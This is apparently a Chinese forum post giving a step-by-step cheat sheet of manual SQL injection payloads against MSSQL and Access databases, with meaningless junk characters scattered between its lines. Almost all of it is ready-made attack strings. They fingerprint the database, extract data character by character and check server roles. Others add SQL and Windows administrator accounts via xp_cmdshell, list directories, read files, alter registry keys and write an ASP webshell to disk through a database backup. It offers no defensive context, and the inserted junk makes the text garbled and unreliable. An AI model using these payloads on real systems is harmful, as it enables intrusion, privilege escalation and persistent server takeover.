手动方式SQL注入脚本命令

1.判断是否有注入;and 1=1 ;and 1=2 
C7G,M  
　　2.初步判断是否是mssql ;and user>0 S-}c_zbl;  
^>&#F[aT  
　　3.注入参数是字符'and [查询条件] and ''=' 1pg#@h[|t  
\q*-9_M  
　　4.搜索时没过滤参数的'and [查询条件] and '%25'=' 3[y$$qXI  
_WvVF*Q"k  
　　5.判断数据库系统 J}[[tl  
$./aKJ1B  
　　;and (select count(*) from sysobjects)>0 mssql 7G^Q2w  
*r[V[9+y-D  
　　;and (select count(*) from msysobjects)>0 access y2#"\5dC  
M]p-<R\  
k7Qs#L  
ZgG~xl\My  
　　6.猜数据库 ;and (select Count(*) from [数据库名])>0 9) ,|h  
-)^vO*b 0  
　　7.猜字段 ;and (select Count(字段名) from 数据库名)>0 m<)`@6a/
 

cfilH"EK  
　　8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 :hs~;vn)  
}eW<P079  
　　9.(1)猜字段的ascii值(access) mv#hy  
Z1I.f"XY  
　　;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 AX$r,KmE  
q?Csm\
Y  
　　(2)猜字段的ascii值(mssql) fz`)CWo:  
d5>&, {o7N  
　　;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 S<NK!89  
SepwMB4@  
　　10.测试权限结构(mssql) bEj}J_#  
#+p-  
$pAJ$0=sw  
FG[rH]  
　　;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- \eNB L[  
M;Pry3J  
　　;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- >W8"Ar  
7 s{vou  
　　;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- `_1~[t  
CEI"p2  
　　;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- $A9Pi"/*z  
=k.%#h{  
　　;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- O^=+"O]  
&.?E[db"h  
　　;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- NJ.oME@=  
Lo_+W1+  
　　;and 1=(select IS_MEMBER('db_owner'));-- fn,hP_  
C 'MR=/sd  
'nGUm
[vh  
,lA@C2c  
　　11.添加mssql和系统的帐户 d8vf kVB  
e
K l;T  
　　;exec master.dbo.sp_addlogin username;-- -$
o0P'Vx  
　　;exec master.dbo.sp_password null,username,password;-- 7`;f<QNo  
-*4*hHmb  
　　;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 3.?be.cq  
?R#$ c]  
　　;exec master.dbo.xp_cmdshell 'net user username password C{pOGc@  
Z3hZy&_I  
　　/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- z,ERq,g+L  
YmaS,Q-  
　　;exec master.dbo.xp_cmdshell 'net user username password /add';-- PIa!NPy  
;10YG6:  
　　;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- m!Z<\2OP  
,G%UU~/a  
=xIZJ8e  
jhf3(hx&F  
　　12.(1)遍历目录 p>+9pxx~U  
xmcZN3 ){+  
　　;create table dirs(paths varchar(100), id int) pg4pfi^__V  
f\dfKNm6  
　　;insert dirs exec master.dbo.xp_dirtree 'c:\' v.Q#<@B^:  
v;e8W9M  
　　;and (select top 1 paths from dirs)>0 clV^Xg8D  
g?v
(>#i  
　　;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) >":xnX#  
$U]T8;5Q  
#DFi-o&-  
[z2UfHpt~  
　　(2)遍历目录 _C?Wk:Y@  
}|=/v(D  
　　;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ]5S`y{j1  
　　;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 4\&Y;upy+  
F!EiF&[\J  
　　;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 hA5')te<  
A\Ib  
　　;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 H,L{N'[Xph  
+m%%Bz>  
　　;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 Icrnu}pl_  
B+`4UfB]Z}  
)xyjQ|b  
%r(WS_%K|  
　　13.mssql中的存储过程 (?\+
  
5\bGCf  
　　xp_regenumvalues 注册表根键, 子键 R\3a Sx L  
D;V[9E=g/  
　　;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 }p
sRgF  
e9KD mX_  
　　xp_regread 根键,子键,键值名 s/IsrcfM  
$!.>
)n  
　　;exec xp_regread c]ARgrH-  
F=e9o*z  
　　'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 Vz/w.%_g  
_=s9o/Cn]  
　　xp_regwrite 根键,子键, 值名, 值类型, 值 -Y/i h(I^  
:Fb>=e  
　　值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ]q%r2 (y,k  
U*$P"sS`  
　　;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 P{n#^4  
h
vw9i7#  
　　xp_regdeletevalue 根键,子键,值名 OY`B{jV-  
KN|<yF   
　　exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 }<A.zwB<i  
Cr7Zi>sd<!  
　　xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 6^]|  
<@-O06  
(4R(5t  
Q p>b  
　　14.mssql的backup创建webshell ):! =XhQ  
l}z<q  
　　use model Dd5 9xNKm  
8J(j}</>a  
　　create table cmd(str image); >5~#BrpwG  
nL:&G'd  
　　insert into cmd(str) values (''); YK3>M"58  
wI_@  
　　backup database model to disk='c:\l.asp'; QE(.w dHP  
?8V.iHJk  
eTx9fxw  
}R['Zoh4I  
　　15.mssql内置函数 [v"Z2F<.=  
\tI%[g1M  
　　;and (select @@version)>0 获得Windows的版本号 ~U]g;u  
yv[j Pbe  
　　;and user_name()='dbo' 判断当前系统的连接用户是不是sa }UW7py!TN  
yQ[;y~W  
　　;and (select user_name())>0 爆当前系统的连接用户 tbRW6  
Zok{ndO@|f  
　　;and (select db_name())>0 得到当前连接的数据库 .Ix3wR9  
~ 1h#  
:*''ci  
(G"'Fb6d  
　　16.简洁的webshell `Y?VQ~ci
>  
K.)!qkW-%S  
　　use model n(F!t,S1i  
r.H`3m.0q  
　　create table cmd(str image); )r9 9zdUk  
2^WJ1: A  
　　insert into cmd(str) values (''); d+JK")$9C  
l'+3 6  
　　backup database model to disk='g:\wwwtest\l.asp';

学习.......... 呵呵 我是好人

这个和好人有关系吗？